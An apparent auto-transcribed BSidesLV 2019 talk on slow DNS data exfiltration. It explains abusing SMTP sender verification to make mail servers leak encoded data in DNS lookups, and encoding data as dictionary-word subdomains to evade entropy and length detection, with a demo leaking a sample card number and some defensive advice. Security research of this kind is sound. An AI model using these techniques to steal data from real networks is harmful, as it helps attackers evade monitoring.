GF - Low & Slow - Techniques for DNS Data Exfiltration - Dimitri Fousekis

Name: GF - Low & Slow - Techniques for DNS Data Exfiltration - Dimitri Fousekis
Uploaded: 2019-10-19
Duration: 26 min 37 s
Description: GF - Low & Slow - Techniques for DNS Data Exfiltration - Dimitri Fousekis Ground Floor BSidesLV 2019 - Tuscany Hotel - Aug 07, 2019

BSides Las Vegas26:37362 viewsPublished 2019-10Watch on YouTube ↗

Mentioned in this talk

Tools used

BIND Git

Protocols

DNS SMTP

Languages

Python

About this talk

GF - Low & Slow - Techniques for DNS Data Exfiltration - Dimitri Fousekis Ground Floor BSidesLV 2019 - Tuscany Hotel - Aug 07, 2019

Show transcript [en]

good morning and welcome back to a ground-floor third series of talks on various exploitation techniques this morning it's been pretty fun as always a few announcements before we begin live-streaming is going on all day in this room so please cell phones off and if you have questions if you wouldn't mind asking them at the microphone so the Internet can pick them up as well like to thank our sponsors especially our inner circle sponsors critical stack and ballot mail as well as stellar sponsors blackberry silence and Robin met it's their support as well as all of your participation that makes this thing possible so please welcome to meet Rufus

[Applause] Thanks okay so we're going to be looking at low-and-slow techniques for DNA successful tration these two things we're going to be looking at this afternoon about how to exfiltrate data from within an environment through DNA's and the main angle of the talk is regarding for example if you're in an assessment or you're trying to assess the security of a company or the ability to detect exfiltration through DNA's what are the other means you can use or if there's some kind of system that's that's catching you out all the time other options that you have to try and get data out of the company so there's two sides to it you can obviously look at it as a way from enough offensive

point of view to see how you can taste the systems work from a defensive point of view you can figure out ways to try and combat what what will will be done if it's not already been handled just briefly so we're not covering DNS tunneling of data in real time in and out right so this is not covering how you can get free Wi-Fi okay but I think everyone knows that by NASA what we're more interested in is getting data out of an environment that is pretty well secured or pretty well locked down we just don't have any other means of getting information out there and you've all got the time to get that information out

there so kind of what what the malware does for example if it's got time low and slow as the talkers get it get their data out there and try and exfiltrate what can be done of course ways to get around it so currently if we look at ways that that data filtration can take place through DNS these of this is the most common one which is your Danis tunnels as I mentioned before there are many tools out there if you just search for them you'll find them they tend to be easily picked up by most things out there these days that are looking for that kind of attack and that kind of exploitation of data other ways

of doing it of course is if you've got bind binary data you could base64 that use it in subdomains and then pick them up on the other side as the DNS queries are being are being performed and convert them back into the data that you want and the takes records also very much very much a well-known attack as well so what systems know and by systems I mean anything out there from a product point of view that's trying to prevent DNA's exfiltration what they're doing pretty well is looking for example for abnormally long requests okay so if they see a DNS request they look like they're look like their first line well then you know there's something wrong large

number of DNS requests from a single host okay so you've got a desktop in the environment it's pushing 200,000 plus DNS queries in the last few minutes you know there's something wrong there it shouldn't be shouldn't be doing that the users of workstation no matter how much they're browsing and working on it and another method commonly used as well is requests without dictionary words so basically anything that is statistically doesn't sound like it would form part of a DNS query because it's not common language to us right it doesn't sound like it's a web server it doesn't sound like it's a name it's it's quite the entropy is quite high the characters appear random of course they are they

aren't but that's what they appear to if they're bringing analyzed so that kind of stuff is also being looked at and detected and then the other one that's also it's common I've seen a tower and have you've seen it more often is a systems capable of checking whether a DNS request was actually followed up by a connection to that IP that came back obviously that requires a tie-in from various other systems and logs to correlate the fact that a DNS query was performed did actually do something with that or have I looked up 10,000 area codes or text records and then didn't actually do anything after after that so we want to find ways to try and get

around some of these because they're pretty good at identifying whether we're trying to exfiltrate data out of the company and we're gonna have a look at two ways to try and accomplish that in this talk so the first one is abusing trusted services within the environment and the angle we're coming to for this one is that generally what we found is when looking for suspicious DNS information oh sorry DNS exfiltration we tend to look at PCs that are doing to median is requests or strange ones we tend to look at at phones bringing on devices a printer or something like that something like an SMTP server for example though wouldn't raise that my suspicion because

it's job is to do DNA lookups right so if you're in an environment and you come across an SMTP server there's a very good chance that either no one's looking at what DNS queries it's doing or it's it's on a whitelist of some kind when it comes to system is checking for DNA 6-fold exfiltration so how can we use it to accelerate data out of the environment now we're not saying seed mail through the SMTP server because that's not really exfiltration and you're going to show up in the log file a mile away anyway what we want to do is get this some TV server to send data out through the initial quiz for us and stop

there without actually doing anything further and what's nice about it some TP servers at least some of them is that they verify a cinder address when they're about to send a message or receive a message so if you connect to the SMTP server port and you identify yourself and then you say mail from so if you look at the third box they're very common mail servers like Exim said mail there's the Oracle communication server for example when they see that they will actually try and look up that domain to figure out whether it's is valid or not as part of the verification so what's happening is from within the environment you are now sending the data you want

the exit rate to the SMTP server as a target email address then you stop there that server went and looked at the DNS address because it thought well I need to do that as part of my verification and at the same time went and connected outside sent the query and sent the the data out that you wanted so you could you could accelerate like that and although you're going to show up in a log file you generally will show up as connections or attempts to send mail that just didn't ever end they timed out base basically because the key is not obviously finished the SMTP transaction you're sending just the mail from the recipient to and then you can cut the

connection from there because the SMTP server will already try and look up that domain and send the the the data out so some servers that we found work by default to do this they don't need specific customization Exim syn mail and / fix an article communication server so if they're running in environment and you want to get data out through the exfiltration you can use this technique we are going to put a two-lap for it but it's generally something you could develop on your own - it's it's not difficult because what you're doing is you're combining the old technique of taking the data base 64 any kind of method that you want and we'll see in

the next technique how to improve on that but you're taking that you're creating these email addresses and asking the server to send mail for them he goes and looks it up and out all those requests go for you and send your data out the environment without actually sending any mail through it we found by default exchange didn't want to wouldn't didn't want to behave like this so you might want to you know if you have time to play around with it and check why I'm guessing it's because I think by default it's not said to verify the sender of the mail so if it's being used as a relay it will get to the point

where it'll block itself as being used as a relay but before that it didn't try and actually verify the sender domain the other ones of course they they're doing that up the Box issues with this tick technique there's not many because we have tried it in a few places and and we weren't picked up by common other tools that were detecting the the attacks primarily because as I mentioned in quite a few administrators will whitelist SMTP servers from those tricks because they're just doing so much work with DNS already you're gonna show up and lock files if there's a tool performing that kind of analysis or someone knows what to look for you are gonna show up as a

system connecting and performing almost half a correct transmission of email and then disappearing again so if someone's looking at the log files for that you will you will see it and then of course these the other options that the verify sender option may be turned off in which case this attacks not going to work because the mail server is not going to try and verify that domain when you try and connect to it so for example how could we also made this well what we could do is we say we but excuse me we got sample credit card data and we're using DNS to verify this IMDB server I'm gonna show you a demonstration this I'm

hoping that the Internet is going to play along for it but as we know it's a could go anyway so what I got in the first window here is a server on the internet listening for the initial quiz very very simple so that's your obviously one of your major steps you need Excel trading DNS data source DNA server you can control on the other side so when I get that command off quickly

okay so what we're doing on the bottom window there's a little Python script there and it's job is to basically connect to the SMTP server I'm using an example there of a credit card number it's invalid obviously and what we're going to do is we want to convert that into this is very easy this is a very simple attack we've kind of written to a hex value then we're going to connect to the SMTP server and say this is a mail from using the DNS exfiltration we're going to have that hex value being part of the domain that we're using and that's all we're going to do and everything a disconnect what's going to happen as sin male is going to try and

verify that domain and inadvertently then also send out this data to the other side so hopefully everything plays along we should be able to rebuild it externally so let's see what happens directory

okay let's try that again [Music] No so what happens when you don't run your DMS from the director you were testing them

[Music]

yeah that usually works

okay so very simply what it's done is it's just basic C for the credit card number and we've registered a test domain called green quality ml and that's what our bind server on the other side is listening for so we want to tell Cyn male that it's going to receive email from Bob at that entire domain at the bottom of there so hopefully if all goes according to plan okay so there so you see in the mail from command since it as that and as you can see immediately seen me I went and queried our DNS server for the actual sender to verify it and then we got that converted it back into normal date data again so

obviously things could still stop this right if there's something sitting on the other side of a some TP server checking whether as I mentioned in the beginning doing statistical checks on whether your dns names make sense or not yes it would still pick this up but generally what we found is the SMTP servers are quite trusted you can see them internally and they tend to have a they can connect out quite easily and no one seems to be watching what they're doing so it's a good Avenue okay so then the second technique we're going to look at is to try and get past the other two tricks that are out there so request without the dictionary words and also

addition abnormally abnormally long requests so how do we get around these two things so if you look at the table below it's quite obvious which one of those is trying to exfiltrate data if you're looking through log files or if you were analyzing them where is on the left it looks more like general DNS queries they will be coming for your DNS server so what we want to do is we see not to create a framework of sort that allows us to take these this data that we want to export rate through DNS and convert it into DNS queries they look like real world DNS queries and then push those out to our custom DNS server

because what will happen then is that statistically we're still following things like there could be English words exist in a dictionary they look like common system names so we can push data out like that now the key thing here is that this is where the slow in low and slow comes in because this is going to take a while because obviously you haven't got much data to work with to send out in each of their queries and as soon as you go to long you're now passing the threshold from where statistically it's an English word or it's not too long and the entropy is too high so how do we get around this what we want to do is so coming back to

the same data that we had again this credit card number we take a table and the framework I mentioned has has a tool to do this we we take it a list of words comedy in this words you can find them anywhere Alexa lists top top lists from search engines custom DNA's anything you want obviously things that make sense and we create a hex to common language table with them so what we want to do is we want to take our data when it's in hex format and be able to get valid English words out of it or comment DNS names out of it so that we can send those out and pick them up on the other side what we

do then is we convert the data to hex values and then we we dump dns names to use so once that the tool is finished doing that are created card number for example will result in the following DNS lookups which the system can use to exfiltrate that credit card number on the other side and basically what we've done it's very simple in image design and you're welcome to make it more complicated I'm sure there's many better ways of doing it is we've taken that whole credit card numbers are from CC until the 17 the the CVV or the check number we turned it into hex and in our table we're saying that for every single

possible double character hicks combination give us an english word that is a common dns name for it right the system does that looks up in in the state table what those characters are converts them to words and then builds the actual name on the other side so for example welcome for dot my dummbell cosa well that's the one that actually represents those two characters CC yeah so on the other end when the tool runs it loads the same dictionary and the same table up and as these queries are coming in it's now piecing it together and saying okay so I got welcome for go looking for convert that back from the hicks into text again

and so on and so forth one caveat you will notice is that sometimes these duplicates because we're using a table so the same hex value is gonna have the same name so if it appears again you're going to have the same query cut out so what you need to make sure and hope for is that the TTL on your on your dns is very very low as low as you can you could possibly go so they expire pretty quickly otherwise he's not going to perform a lookup again and what's going to happen is the receiver and the other rains going to be out of sync because he's not receiving the correct information on that side the other thing

to look out for as well of course is try and mix the domains so we're building that into this framework as well so you can read register a pool of domains that you're bind server will listen to on the other side and it can randomly just change those or it can use them for various things so for example welcome for dot xyz.com if X Y Z comes being used and your bind server picks that up that means it's the start of binary data and then you can send the Meidum domain or any other domain and end it with something else that XYZ to come and that'll mark the end of the binary data so that way you can build some kind of

errors in so that when you're building the data on the other side the system can make sense of what exactly it is receiving again this is going to take it's going to take a while depending how fast you can push data out so if you're doing this directly against the DNA server yes you can do it quite quite fast if you're doing a three SMTP attack that we saw in the beginning that's going to take a bit longer you can generally fire off the requests quite fast against the SMTP server but again you want to try and play under the radar of where detection tools are going to start figuring out that you're sending too many mails

and too much data out of the company the other thing to keep in mind as well is obviously use a dictionary so the system just takes any word list as a dictionary but it's gotta be stuff that makes sense right because statistical tools that are statistically analyzing dnase queries to look for DNA six exfiltration are quite good so and with machine learning and things like that there can be a pretty good understanding not just what's English and what's not but what's commonly used on the web and what is not you know so if you plugged in a medical dictionary into the system you might get detected because those kind of subdomains don't really appear every we

on the nead so pick stuff or what I used here was I just looked for on the internet for a list of common subdomains used for hosting environments because I figured there will be the most called and then you can play around with that and get lists and things that that work for you as mentioned we will put this framework up on get up soon if you follow my Twitter account you'll you'll find the tools there we're trying to build a framework up piece of a piece at a time so you'll be told to use a some TP exfiltration there'll be a tool for common language the NXT filtration or C LD e as we call it and of course we we

want everyone to build on that and try and make it better from a defense point of view again as I mentioned it's very ways to pick up this is happening in your environment from an SMTP server perspective you should probably be looking at what the logs are doing the actual engines logs so that you can map DNS queries according to what the server was was doing and you may if you're paying enough attention or if your tools are adequate enough which are analyzing their data they'll see that these DNS queries that you were doing were coming from only half sent messages but again it depends on the logging as well we've seen some environments where the big to

avoid the log faults growing too big if an SMTP message is not fully transmitted correctly which it would stopped the server won't even log that at all which case that's a field day for this attack because you're never going to show up in a log file because you didn't finish the SMTP session other things we want to build into it obviously is to be able to do a TCP connect so keep that in mind as well I think there's one tool not remember its name but I came across it that is using machine learning for looking for various attacks one of them is DNA filtration and what it is doing is it's looking at DNS queries coming

out of the environment versus connections going through the firewall or firewalls so that kind of thing something to look out for if you want to try and test if you're being nabbed again some of this also is only it's already proactive it's a reactive attack because you can see in the data out at early next week when millions and millions of records have been processed to get somebody come to you and say ok something was up here that shouldn't be now but again it is possible to do that ok so I only had 27 minutes for this for this talk so it's I'm not sure we're gonna have enough time for questions but maybe one or two very quick ones if

anyone has any ok we'll start there it will start with at the mic yeah ok the top is awesome like I really like the tool and stuff can't you use the SMTP server when you do the hello doesn't it look up what domain you're from because we knew use that then of the few places that log the SMTP not half cents to see if you're very smart addresses then they won't surely log that because you haven't even started sending you've just said hello today yeah so that would work too the reason I didn't put it in the talk is because it's it's not on by default in most in I think all of those servers are not mistaken so you need to

turn on its ability to do that if it is on yeah that that's great because we're at the beginning you can see in the DNS query the DNA sticks filtration on the hello yeah oh cool thanks else was there someone else

was just curious about the lookup table of words stuff like that would you can you have the ability to have different look-up tables every 20 characters so that you get much more random or every 5 5 characters so they get a much more random distribution of domain names yeah yeah yeah you can so you can extend it if you can you make it as long or as short if you want you can randomly select within the file you can it really depends what you're plugging into it so you can create exactly how you want that file to look when the system uses it to create less table I guess my thoughts was was where the same was welcome if

say was after 20 characters could it be a different DNS name altogether yes oh I see yeah yeah yeah ok so you mean the actual lookup title change I mean the subdomain you mean the domain it's doing the acceleration to on the other end yeah yeah we currently have that built in but we could look at doing that yeah so it could do that that's also a good idea as well okay so that's that's the end of our time fortunately but my

[Applause]

GF - Low & Slow - Techniques for DNS Data Exfiltration - Dimitri Fousekis

Related talks